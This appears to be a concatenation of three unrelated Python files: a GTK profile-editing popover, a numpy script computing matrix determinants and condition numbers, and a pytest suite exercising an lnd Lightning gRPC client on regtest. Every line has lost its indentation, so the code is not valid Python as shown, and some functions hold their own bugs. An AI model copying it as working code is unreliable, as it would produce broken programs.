gi.require_version('Gdk', '3.0')
from gi.repository import Gtk, GObject, Gdk
class ProfilePopoverMode(enum.Enum):
EDIT = 'edit'
ADD = 'add'
class ProfilePopover(Gtk.Popover, GtkObserver):
def __init__(self, prefs, mode=ProfilePopoverMode.EDIT):
Gtk.Popover.__init__(self)
GtkObserver.__init__(self)
self._prefs = prefs
self._mode = mode
self._lastRow = 0
self.build()
self.connect('show', self.shown)
def updateFromPrefs(self):
self._profileName.set_text(self._prefs.selectedProfileName())
profile = self._prefs.selectedProfile()
lcdColor = profile.lcdColor
self._lcdColorButton.set_rgba(Gdk.RGBA(*lcdColor, alpha=1.0))
stickMode = profile.stickMode
activeIndex = sorted(list(ALL_STICK_MODES)).index(stickMode)
self._stickModeCombo.set_active(activeIndex)
def commitToPrefs(self):
pass
def addRow(self, widget, labelText=None):
if labelText:
label = Gtk.Label()
label.set_text(labelText)
self._grid.attach(label, 1, self._lastRow, 1, 1)
self._grid.attach(widget, 2, self._lastRow, 1, 1)
else:
self._grid.attach(widget, 1, self._lastRow, 2, 1)
self._lastRow += 1
def build(self):
self._grid = Gtk.Grid()
self._grid.set_row_spacing(6)
self._grid.set_column_spacing(10)
self._grid.set_border_width(6)
self.add(self._grid)
self._profileName = Gtk.Entry()
self._profileName.set_can_focus(True)
self._profileName.set_activates_default(True)
self.addRow(self._profileName, 'Profile Name')
self._lcdColorButton = Gtk.ColorButton()
self._lcdColorButton.set_use_alpha(False)
self._lcdColorButton.set_rgba(Gdk.RGBA(*bindings.DEFAULT_LCD_COLOR))
self._lcdColorButton.set_title('LCD Color')
self.addRow(self._lcdColorButton, 'LCD Color')
self._stickModeCombo = Gtk.ComboBoxText()
for mode in sorted(list(ALL_STICK_MODES)):
self._stickModeCombo.append_text(mode.capitalize())
self._stickModeCombo.set_active(1)
self.addRow(self._stickModeCombo, 'Joystick Mode')
commitButton = Gtk.Button()
commitButton.set_receives_default(True)
commitButton.set_can_default(True)
commitButton.connect('clicked', self.commitClicked)
if self._mode == ProfilePopoverMode.EDIT:
commitButton.set_label('Update')
commitButton.get_style_context().add_class('suggested-action')
self.addRow(commitButton)
removeButton = Gtk.Button()
removeButton.set_label('Remove')
removeButton.connect('clicked', self.removeClicked)
removeButton.get_style_context().add_class('destructive-action')
self.addRow(removeButton)
else:
commitButton.set_label('Add')
commitButton.get_style_context().add_class('suggested-action')
self.addRow(commitButton)
self._grid.show_all()
def commitClicked(self, widget):
lcdColor = self._lcdColorButton.get_rgba()
lcdColor = (lcdColor.red, lcdColor.green, lcdColor.blue)
profileName = self._profileName.get_text()
stickMode = self._stickModeCombo.get_active_text()
profile = None
if self._mode == ProfilePopoverMode.ADD:
profile = BindingProfile()
self._prefs.addProfile(profileName, profile)
else:
profile = self._prefs.selectedProfile()
profile.lcdColor = lcdColor
profile.stickMode = stickMode.upper()
self.hide()
def removeClicked(self, widget):
pass
def shown(self, widget):
self._profileName.grab_focus()
if self._mode == ProfilePopoverMode.EDIT:
self.updateFromPrefs()
|
python
|
import numpy as np
from Matrices import *
print("Determinant of diagonal matrix:")
print(np.linalg.det(diag_A))
diag_A_rev = np.linalg.inv(diag_A)
print("Condition number of diagonal matrix:")
print(np.linalg.norm(diag_A_rev) * np.linalg.norm(diag_A))
print("Determinant of random matrix:")
print(np.linalg.det(random_A))
random_A_rev = np.linalg.inv(random_A)
print("Condition number of random matrix:")
print(np.linalg.norm(random_A_rev) * np.linalg.norm(random_A))
print("Determinant of Hilbert matrix:")
print(np.linalg.det(hilbert_A))
hilbert_A_rev = np.linalg.inv(hilbert_A)
print("Condition number of Hilbert matrix:")
print(np.linalg.norm(hilbert_A_rev) * np.linalg.norm(hilbert_A))
|
python
|
import sys
import time
import threading
import queue
from hashlib import sha256
from secrets import token_bytes
import grpc
from lnd_grpc.protos import invoices_pb2 as invoices_pb2, rpc_pb2
from loop_rpc.protos import loop_client_pb2
from test_utils.fixtures import *
from test_utils.lnd import LndNode
impls = [LndNode]
if TEST_DEBUG:
logging.basicConfig(
level=logging.DEBUG, format="%(name)-12s %(message)s", stream=sys.stdout
)
logging.info("Tests running in '%s'", TEST_DIR)
FUND_AMT = 10 ** 7
SEND_AMT = 10 ** 3
def get_updates(_queue):
"""
Get all available updates from a queue.Queue() instance and return them as a list
"""
_list = []
while not _queue.empty():
_list.append(_queue.get())
return _list
def transact_and_mine(btc):
"""
Generate some transactions and blocks.
To make bitcoind's `estimatesmartfee` succeeded.
"""
addr = btc.rpc.getnewaddress("", "bech32")
for i in range(10):
for j in range(10):
txid = btc.rpc.sendtoaddress(addr, 0.5)
btc.rpc.generatetoaddress(1, addr)
def wait_for(success, timeout=30, interval=0.25):
start_time = time.time()
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def wait_for_bool(success, timeout=30, interval=0.25):
start_time = time.time()
while not success and time.time() < start_time + timeout:
time.sleep(interval)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def sync_blockheight(btc, nodes):
"""
Sync blockheight of nodes by checking logs until timeout
"""
info = btc.rpc.getblockchaininfo()
blocks = info["blocks"]
for n in nodes:
wait_for(lambda: n.get_info().block_height == blocks, interval=1)
time.sleep(0.25)
def generate_until(btc, success, blocks=30, interval=1):
"""
Generate new blocks until `success` returns true.
Mainly used to wait for transactions to confirm since they might
be delayed and we don't want to add a long waiting time to all
tests just because some are slow.
"""
addr = btc.rpc.getnewaddress("", "bech32")
for i in range(blocks):
time.sleep(interval)
if success():
return
generate(bitcoind, 1)
time.sleep(interval)
if not success():
raise ValueError("Generated %d blocks, but still no success", blocks)
def gen_and_sync_lnd(bitcoind, nodes):
"""
generate a few blocks and wait for lnd nodes to sync
"""
generate(bitcoind, 3)
sync_blockheight(bitcoind, nodes=nodes)
for node in nodes:
wait_for(lambda: node.get_info().synced_to_chain, interval=0.25)
time.sleep(0.25)
def generate(bitcoind, blocks):
addr = bitcoind.rpc.getnewaddress("", "bech32")
bitcoind.rpc.generatetoaddress(blocks, addr)
def close_all_channels(bitcoind, nodes):
"""
Recursively close each channel for each node in the list of nodes passed in and assert
"""
gen_and_sync_lnd(bitcoind, nodes)
for node in nodes:
for channel in node.list_channels():
channel_point = channel.channel_point
node.close_channel(channel_point=channel_point).__next__()
gen_and_sync_lnd(bitcoind, nodes)
assert not node.list_channels()
gen_and_sync_lnd(bitcoind, nodes)
def disconnect_all_peers(bitcoind, nodes):
"""
Recursively disconnect each peer from each node in the list of nodes passed in and assert
"""
gen_and_sync_lnd(bitcoind, nodes)
for node in nodes:
peers = [p.pub_key for p in node.list_peers()]
for peer in peers:
node.disconnect_peer(pub_key=peer)
wait_for(lambda: peer not in node.list_peers(), timeout=5)
assert peer not in [p.pub_key for p in node.list_peers()]
gen_and_sync_lnd(bitcoind, nodes)
def get_addresses(node, response="str"):
p2wkh_address = node.new_address(address_type="p2wkh")
np2wkh_address = node.new_address(address_type="np2wkh")
if response == "str":
return p2wkh_address.address, np2wkh_address.address
return p2wkh_address, np2wkh_address
def setup_nodes(bitcoind, nodes, delay=0):
"""
Break down all nodes, open fresh channels between them with half the balance pushed remotely
and assert
:return: the setup nodes
"""
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
# First break down nodes. This avoids situations where a test fails and breakdown is not called
break_down_nodes(bitcoind, nodes, delay)
# setup requested nodes and create a single channel from one to the next
# capacity in one direction only (alphabetical)
setup_channels(bitcoind, nodes, delay)
return nodes
def setup_channels(bitcoind, nodes, delay):
for i, node in enumerate(nodes):
if i + 1 == len(nodes):
break
nodes[i].connect(
str(nodes[i + 1].id() + "@localhost:" + str(nodes[i + 1].daemon.port)),
perm=1,
)
wait_for(lambda: nodes[i].list_peers(), interval=0.25)
wait_for(lambda: nodes[i + 1].list_peers(), interval=0.25)
time.sleep(delay)
nodes[i].add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [nodes[i], nodes[i + 1]])
nodes[i].open_channel_sync(
node_pubkey_string=nodes[i + 1].id(),
local_funding_amount=FUND_AMT,
push_sat=int(FUND_AMT / 2),
spend_unconfirmed=True,
)
time.sleep(delay)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [nodes[i], nodes[i + 1]])
assert confirm_channel(bitcoind, nodes[i], nodes[i + 1])
def break_down_nodes(bitcoind, nodes, delay=0):
close_all_channels(bitcoind, nodes)
time.sleep(delay)
disconnect_all_peers(bitcoind, nodes)
time.sleep(delay)
def confirm_channel(bitcoind, n1, n2):
"""
Confirm that a channel is open between two nodes
"""
assert n1.id() in [p.pub_key for p in n2.list_peers()]
assert n2.id() in [p.pub_key for p in n1.list_peers()]
for i in range(10):
time.sleep(0.5)
if n1.check_channel(n2) and n2.check_channel(n1):
return True
addr = bitcoind.rpc.getnewaddress("", "bech32")
bhash = bitcoind.rpc.generatetoaddress(1, addr)[0]
n1.block_sync(bhash)
n2.block_sync(bhash)
# Last ditch attempt
return n1.check_channel(n2) and n2.check_channel(n1)
# def idfn(impls):
# """
# Not used currently
# """
# return "_".join([i.displayName for i in impls])
def wipe_channels_from_disk(node, network="regtest"):
"""
used to test channel backups
"""
_channel_backup = node.lnd_dir + f"chain/bitcoin/{network}/channel.backup"
_channel_db = node.lnd_dir + f"graph/{network}/channel.db"
assert os.path.exists(_channel_backup)
assert os.path.exists(_channel_db)
os.remove(_channel_backup)
os.remove(_channel_db)
assert not os.path.exists(_channel_backup)
assert not os.path.exists(_channel_db)
def random_32_byte_hash():
"""
Can generate an invoice preimage and corresponding payment hash
:return: 32 byte sha256 hash digest, 32 byte preimage
"""
preimage = token_bytes(32)
_hash = sha256(preimage)
return _hash.digest(), preimage
#########
# Tests #
#########
class TestNonInteractiveLightning:
"""
Non-interactive tests will share a common lnd instance because test passes/failures will not
impact future tests.
"""
def test_start(self, bitcoind, alice):
assert alice.get_info()
sync_blockheight(bitcoind, [alice])
def test_wallet_balance(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_info(), rpc_pb2.GetInfoResponse)
pytest.raises(TypeError, alice.wallet_balance, "please")
def test_channel_balance(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.channel_balance(), rpc_pb2.ChannelBalanceResponse)
pytest.raises(TypeError, alice.channel_balance, "please")
def test_get_transactions(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_transactions(), rpc_pb2.TransactionDetails)
pytest.raises(TypeError, alice.get_transactions, "please")
def test_send_coins(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
p2wkh_address, np2wkh_address = get_addresses(alice)
# test passes
send1 = alice.send_coins(addr=p2wkh_address, amount=100000)
generate(alice.bitcoin, 1)
time.sleep(0.5)
send2 = alice.send_coins(addr=np2wkh_address, amount=100000)
assert isinstance(send1, rpc_pb2.SendCoinsResponse)
assert isinstance(send2, rpc_pb2.SendCoinsResponse)
# test failures
pytest.raises(
grpc.RpcError,
lambda: alice.send_coins(
alice.new_address(address_type="p2wkh").address, amount=100000 * -1
),
)
pytest.raises(
grpc.RpcError,
lambda: alice.send_coins(
alice.new_address(address_type="p2wkh").address, amount=1000000000000000
),
)
def test_send_many(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
p2wkh_address, np2wkh_address = get_addresses(alice)
send_dict = {p2wkh_address: 100000, np2wkh_address: 100000}
send = alice.send_many(addr_to_amount=send_dict)
alice.bitcoin.rpc.generatetoaddress(1, p2wkh_address)
time.sleep(0.5)
assert isinstance(send, rpc_pb2.SendManyResponse)
def test_list_unspent(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
alice.add_funds(alice.bitcoin, 1)
assert isinstance(alice.list_unspent(0, 1000), rpc_pb2.ListUnspentResponse)
def test_subscribe_transactions(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
subscription = alice.subscribe_transactions()
alice.add_funds(alice.bitcoin, 1)
assert isinstance(subscription, grpc._channel._Rendezvous)
assert isinstance(subscription.__next__(), rpc_pb2.Transaction)
# gen_and_sync_lnd(alice.bitcoin, [alice])
# transaction_updates = queue.LifoQueue()
#
# def sub_transactions():
# try:
# for response in alice.subscribe_transactions():
# transaction_updates.put(response)
# except StopIteration:
# pass
#
# alice_sub = threading.Thread(target=sub_transactions(), daemon=True)
# alice_sub.start()
# time.sleep(1)
# while not alice_sub.is_alive():
# time.sleep(0.1)
# alice.add_funds(alice.bitcoin, 1)
#
# assert any(isinstance(update) == rpc_pb2.Transaction for update in get_updates(transaction_updates))
def test_new_address(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
p2wkh_address, np2wkh_address = get_addresses(alice, "response")
assert isinstance(p2wkh_address, rpc_pb2.NewAddressResponse)
assert isinstance(np2wkh_address, rpc_pb2.NewAddressResponse)
def test_sign_verify_message(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
message = "Test message to sign and verify."
signature = alice.sign_message(message)
assert isinstance(signature, rpc_pb2.SignMessageResponse)
verified_message = alice.verify_message(message, signature.signature)
assert isinstance(verified_message, rpc_pb2.VerifyMessageResponse)
def test_get_info(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_info(), rpc_pb2.GetInfoResponse)
def test_pending_channels(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.pending_channels(), rpc_pb2.PendingChannelsResponse)
# Skipping list_channels and closed_channels as we don't return their responses directly
def test_add_invoice(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
invoice = alice.add_invoice(value=SEND_AMT)
assert isinstance(invoice, rpc_pb2.AddInvoiceResponse)
def test_list_invoices(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.list_invoices(), rpc_pb2.ListInvoiceResponse)
def test_lookup_invoice(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
payment_hash = alice.add_invoice(value=SEND_AMT).r_hash
assert isinstance(alice.lookup_invoice(r_hash=payment_hash), rpc_pb2.Invoice)
def test_subscribe_invoices(self, alice):
"""
Invoice subscription run as a thread
"""
gen_and_sync_lnd(alice.bitcoin, [alice])
invoice_updates = queue.LifoQueue()
def sub_invoices():
try:
for response in alice.subscribe_invoices():
invoice_updates.put(response)
except grpc._channel._Rendezvous:
pass
alice_sub = threading.Thread(target=sub_invoices, daemon=True)
alice_sub.start()
time.sleep(1)
while not alice_sub.is_alive():
time.sleep(0.1)
alice.add_invoice(value=SEND_AMT)
alice.daemon.wait_for_log("AddIndex")
time.sleep(0.1)
assert any(
isinstance(update, rpc_pb2.Invoice)
for update in get_updates(invoice_updates)
)
def test_decode_payment_request(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
pay_req = alice.add_invoice(value=SEND_AMT).payment_request
decoded_req = alice.decode_pay_req(pay_req=pay_req)
assert isinstance(decoded_req, rpc_pb2.PayReq)
def test_list_payments(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.list_payments(), rpc_pb2.ListPaymentsResponse)
def test_delete_all_payments(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(
alice.delete_all_payments(), rpc_pb2.DeleteAllPaymentsResponse
)
def test_describe_graph(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.describe_graph(), rpc_pb2.ChannelGraph)
# Skipping get_chan_info, subscribe_chan_events, get_alice_info, query_routes
def test_get_network_info(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.get_network_info(), rpc_pb2.NetworkInfo)
@pytest.mark.skipif(
TRAVIS is True,
reason="Travis doesn't like this one. Possibly a race"
"condition not worth debugging",
)
def test_stop_daemon(self, node_factory):
node = node_factory.get_node(implementation=LndNode, node_id="test_stop_node")
node.daemon.wait_for_log("Server listening on")
node.stop_daemon()
# use is_in_log instead of wait_for_log as node daemon should be shutdown
node.daemon.is_in_log("Shutdown complete")
time.sleep(1)
with pytest.raises(grpc.RpcError):
node.get_info()
def test_debug_level(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(
alice.debug_level(level_spec="warn"), rpc_pb2.DebugLevelResponse
)
def test_fee_report(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.fee_report(), rpc_pb2.FeeReportResponse)
def test_forwarding_history(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
assert isinstance(alice.forwarding_history(), rpc_pb2.ForwardingHistoryResponse)
def test_lightning_stub(self, alice):
gen_and_sync_lnd(alice.bitcoin, [alice])
original_stub = alice.lightning_stub
# not simulation of actual failure, but failure in the form that should be detected by
# connectivity event logger
alice.connection_status_change = True
# make a call to stimulate stub regeneration
alice.get_info()
new_stub = alice.lightning_stub
assert original_stub != new_stub
class TestInteractiveLightning:
def test_peer_connection(self, bob, carol, dave, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
# connection tests
connection1 = bob.connect(
str(carol.id() + "@localhost:" + str(carol.daemon.port))
)
wait_for(lambda: bob.list_peers(), timeout=5)
wait_for(lambda: carol.list_peers(), timeout=5)
# check bob connected to carol using connect() and list_peers()
assert isinstance(connection1, rpc_pb2.ConnectPeerResponse)
assert bob.id() in [p.pub_key for p in carol.list_peers()]
assert carol.id() in [p.pub_key for p in bob.list_peers()]
dave_ln_addr = dave.lightning_address(
pubkey=dave.id(), host="localhost:" + str(dave.daemon.port)
)
carol.connect_peer(dave_ln_addr)
wait_for(lambda: carol.list_peers(), timeout=5)
wait_for(lambda: dave.list_peers(), timeout=5)
# check carol connected to dave using connect() and list_peers()
assert carol.id() in [p.pub_key for p in dave.list_peers()]
assert dave.id() in [p.pub_key for p in carol.list_peers()]
generate(bob.bitcoin, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
# Disconnection tests
bob.disconnect_peer(pub_key=str(carol.id()))
time.sleep(0.25)
# check bob not connected to carol using connect() and list_peers()
assert bob.id() not in [p.pub_key for p in carol.list_peers()]
assert carol.id() not in [p.pub_key for p in bob.list_peers()]
carol.disconnect_peer(dave.id())
wait_for(lambda: not carol.list_peers(), timeout=5)
wait_for(lambda: not dave.list_peers(), timeout=5)
# check carol not connected to dave using connect_peer() and list_peers()
assert carol.id() not in [p.pub_key for p in dave.list_peers()]
assert dave.id() not in [p.pub_key for p in carol.list_peers()]
def test_open_channel_sync(self, bob, carol, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
disconnect_all_peers(bitcoind, [bob, carol])
bob.connect(str(carol.id() + "@localhost:" + str(carol.daemon.port)), perm=1)
wait_for(lambda: bob.list_peers(), interval=1)
wait_for(lambda: carol.list_peers(), interval=1)
bob.add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
bob.open_channel_sync(
node_pubkey_string=carol.id(), local_funding_amount=FUND_AMT
)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert confirm_channel(bitcoind, bob, carol)
assert bob.check_channel(carol)
assert carol.check_channel(bob)
def test_open_channel(self, bob, carol, bitcoind):
# Needed by lnd in order to have at least one block in the last 2 hours
generate(bitcoind, 1)
break_down_nodes(bitcoind, nodes=[bob, carol])
bob.connect(str(carol.id() + "@localhost:" + str(carol.daemon.port)), perm=1)
wait_for(lambda: bob.list_peers(), interval=0.5)
wait_for(lambda: carol.list_peers(), interval=0.5)
bob.add_funds(bitcoind, 1)
gen_and_sync_lnd(bitcoind, [bob, carol])
bob.open_channel(
node_pubkey_string=carol.id(), local_funding_amount=FUND_AMT
).__next__()
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert confirm_channel(bitcoind, bob, carol)
assert bob.check_channel(carol)
assert carol.check_channel(bob)
def test_close_channel(self, bob, carol, bitcoind):
bob, carol = setup_nodes(bitcoind, [bob, carol])
channel_point = bob.list_channels()[0].channel_point
bob.close_channel(channel_point=channel_point).__next__()
generate(bitcoind, 6)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert bob.check_channel(carol) is False
assert carol.check_channel(bob) is False
def test_send_payment_sync(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
# test payment request method
invoice = carol.add_invoice(value=SEND_AMT)
bob.send_payment_sync(payment_request=invoice.payment_request)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test manually specified request
invoice2 = carol.add_invoice(value=SEND_AMT)
bob.send_payment_sync(
dest_string=carol.id(),
amt=SEND_AMT,
payment_hash=invoice2.r_hash,
final_cltv_delta=144,
)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash2 = carol.decode_pay_req(invoice2.payment_request).payment_hash
assert payment_hash2 in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test sending any amount to an invoice which requested 0
invoice3 = carol.add_invoice(value=0)
bob.send_payment_sync(payment_request=invoice3.payment_request, amt=SEND_AMT)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice3.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
inv_paid = carol.lookup_invoice(r_hash_str=payment_hash)
assert inv_paid.settled is True
assert inv_paid.amt_paid_sat == SEND_AMT
def test_send_payment(self, bitcoind, bob, carol):
# TODO: remove try/except hack for curve generation
bob, carol = setup_nodes(bitcoind, [bob, carol])
# test payment request method
invoice = carol.add_invoice(value=SEND_AMT)
try:
bob.send_payment(payment_request=invoice.payment_request).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test manually specified request
invoice2 = carol.add_invoice(value=SEND_AMT)
try:
bob.send_payment(
dest_string=carol.id(),
amt=SEND_AMT,
payment_hash=invoice2.r_hash,
final_cltv_delta=144,
).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash2 = carol.decode_pay_req(invoice2.payment_request).payment_hash
assert payment_hash2 in [p.payment_hash for p in bob.list_payments().payments]
assert carol.lookup_invoice(r_hash_str=payment_hash).settled is True
# test sending different amount to invoice where 0 is requested
invoice = carol.add_invoice(value=0)
try:
bob.send_payment(
payment_request=invoice.payment_request, amt=SEND_AMT
).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
payment_hash = carol.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
inv_paid = carol.lookup_invoice(r_hash_str=payment_hash)
assert inv_paid.settled is True
assert inv_paid.amt_paid_sat == SEND_AMT
def test_send_to_route_sync(self, bitcoind, bob, carol, dave):
bob, carol, dave = setup_nodes(bitcoind, [bob, carol, dave])
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
invoice = dave.add_invoice(value=SEND_AMT)
route = bob.query_routes(pub_key=dave.id(), amt=SEND_AMT, final_cltv_delta=144)
bob.send_to_route_sync(payment_hash=invoice.r_hash, route=route[0])
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
payment_hash = dave.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert dave.lookup_invoice(r_hash_str=payment_hash).settled is True
def test_send_to_route(self, bitcoind, bob, carol, dave):
bob, carol, dave = setup_nodes(bitcoind, [bob, carol, dave])
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
invoice = dave.add_invoice(value=SEND_AMT)
route = bob.query_routes(pub_key=dave.id(), amt=SEND_AMT, final_cltv_delta=144)
try:
bob.send_to_route(invoice=invoice, route=route[0]).__next__()
except StopIteration:
pass
bob.daemon.wait_for_log("Closed completed SETTLE circuit", timeout=60)
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol, dave])
payment_hash = dave.decode_pay_req(invoice.payment_request).payment_hash
assert payment_hash in [p.payment_hash for p in bob.list_payments().payments]
assert dave.lookup_invoice(r_hash_str=payment_hash).settled is True
def test_subscribe_channel_events(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
gen_and_sync_lnd(bitcoind, [bob, carol])
chan_updates = queue.LifoQueue()
def sub_channel_events():
try:
for response in bob.subscribe_channel_events():
chan_updates.put(response)
except grpc._channel._Rendezvous:
pass
bob_sub = threading.Thread(target=sub_channel_events, daemon=True)
bob_sub.start()
time.sleep(1)
while not bob_sub.is_alive():
time.sleep(0.1)
channel_point = bob.list_channels()[0].channel_point
bob.close_channel(channel_point=channel_point).__next__()
generate(bitcoind, 3)
gen_and_sync_lnd(bitcoind, [bob, carol])
assert any(
update.closed_channel is not None for update in get_updates(chan_updates)
)
def test_subscribe_channel_graph(self, bitcoind, bob, carol, dave):
bob, carol = setup_nodes(bitcoind, [bob, carol])
new_fee = 5555
subscription = bob.subscribe_channel_graph()
carol.update_channel_policy(
chan_point=None,
base_fee_msat=new_fee,
fee_rate=0.5555,
time_lock_delta=9,
is_global=True,
)
assert isinstance(subscription.__next__(), rpc_pb2.GraphTopologyUpdate)
def test_update_channel_policy(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
update = bob.update_channel_policy(
chan_point=None,
base_fee_msat=5555,
fee_rate=0.5555,
time_lock_delta=9,
is_global=True,
)
assert isinstance(update, rpc_pb2.PolicyUpdateResponse)
class TestChannelBackup:
def test_export_verify_restore_multi(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
funding_txid, output_index = bob.list_channels()[0].channel_point.split(":")
channel_point = bob.channel_point_generator(
funding_txid=funding_txid, output_index=output_index
)
all_backup = bob.export_all_channel_backups()
assert isinstance(all_backup, rpc_pb2.ChanBackupSnapshot)
# assert the multi_chan backup
assert bob.verify_chan_backup(multi_chan_backup=all_backup.multi_chan_backup)
bob.stop()
wipe_channels_from_disk(bob)
bob.start()
assert not bob.list_channels()
assert bob.restore_chan_backup(
multi_chan_backup=all_backup.multi_chan_backup.multi_chan_backup
)
bob.daemon.wait_for_log("Inserting 1 SCB channel shells into DB")
carol.daemon.wait_for_log("Broadcasting force close transaction")
generate(bitcoind, 6)
bob.daemon.wait_for_log("Publishing sweep tx", timeout=120)
generate(bitcoind, 6)
assert bob.daemon.wait_for_log(
"a contract has been fully resolved!", timeout=120
)
def test_export_verify_restore_single(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
funding_txid, output_index = bob.list_channels()[0].channel_point.split(":")
channel_point = bob.channel_point_generator(
funding_txid=funding_txid, output_index=output_index
)
single_backup = bob.export_chan_backup(chan_point=channel_point)
assert isinstance(single_backup, rpc_pb2.ChannelBackup)
packed_backup = bob.pack_into_channelbackups(single_backup=single_backup)
# assert the single_chan_backup
assert bob.verify_chan_backup(single_chan_backups=packed_backup)
bob.stop()
wipe_channels_from_disk(bob)
bob.start()
assert not bob.list_channels()
assert bob.restore_chan_backup(chan_backups=packed_backup)
bob.daemon.wait_for_log("Inserting 1 SCB channel shells into DB")
carol.daemon.wait_for_log("Broadcasting force close transaction")
generate(bitcoind, 6)
bob.daemon.wait_for_log("Publishing sweep tx", timeout=120)
generate(bitcoind, 6)
assert bob.daemon.wait_for_log(
"a contract has been fully resolved!", timeout=120
)
class TestInvoices:
def test_all_invoice(self, bitcoind, bob, carol):
bob, carol = setup_nodes(bitcoind, [bob, carol])
_hash, preimage = random_32_byte_hash()
invoice_queue = queue.LifoQueue()
invoice = carol.add_hold_invoice(
memo="pytest hold invoice", hash=_hash, value=SEND_AMT
)
decoded_invoice = carol.decode_pay_req(pay_req=invoice.payment_request)
assert isinstance(invoice, invoices_pb2.AddHoldInvoiceResp)
# thread functions
def inv_sub_worker(_hash):
try:
for _response in carol.subscribe_single_invoice(_hash):
invoice_queue.put(_response)
except grpc._channel._Rendezvous:
pass
def pay_hold_inv_worker(payment_request):
try:
bob.pay_invoice(payment_request=payment_request)
except grpc._channel._Rendezvous:
pass
def settle_inv_worker(_preimage):
try:
carol.settle_invoice(preimage=_preimage)
except grpc._channel._Rendezvous:
pass
# setup the threads
inv_sub = threading.Thread(
target=inv_sub_worker, name="inv_sub", args=[_hash], daemon=True
)
pay_inv = threading.Thread(
target=pay_hold_inv_worker, args=[invoice.payment_request]
)
settle_inv = threading.Thread(target=settle_inv_worker, args=[preimage])
# start the threads
inv_sub.start()
# wait for subscription to start
while not inv_sub.is_alive():
time.sleep(0.1)
pay_inv.start()
time.sleep(2)
# carol.daemon.wait_for_log(regex=f'Invoice({decoded_invoice.payment_hash}): accepted,')
settle_inv.start()
while settle_inv.is_alive():
time.sleep(0.1)
inv_sub.join(timeout=1)
assert any(invoice.settled is True for invoice in get_updates(invoice_queue))
class TestLoop:
@pytest.mark.skip(reason="waiting to configure loop swapserver")
def test_loop_out_quote(self, bitcoind, alice, bob, loopd):
"""
250000 satoshis is currently middle of range of allowed loop amounts
"""
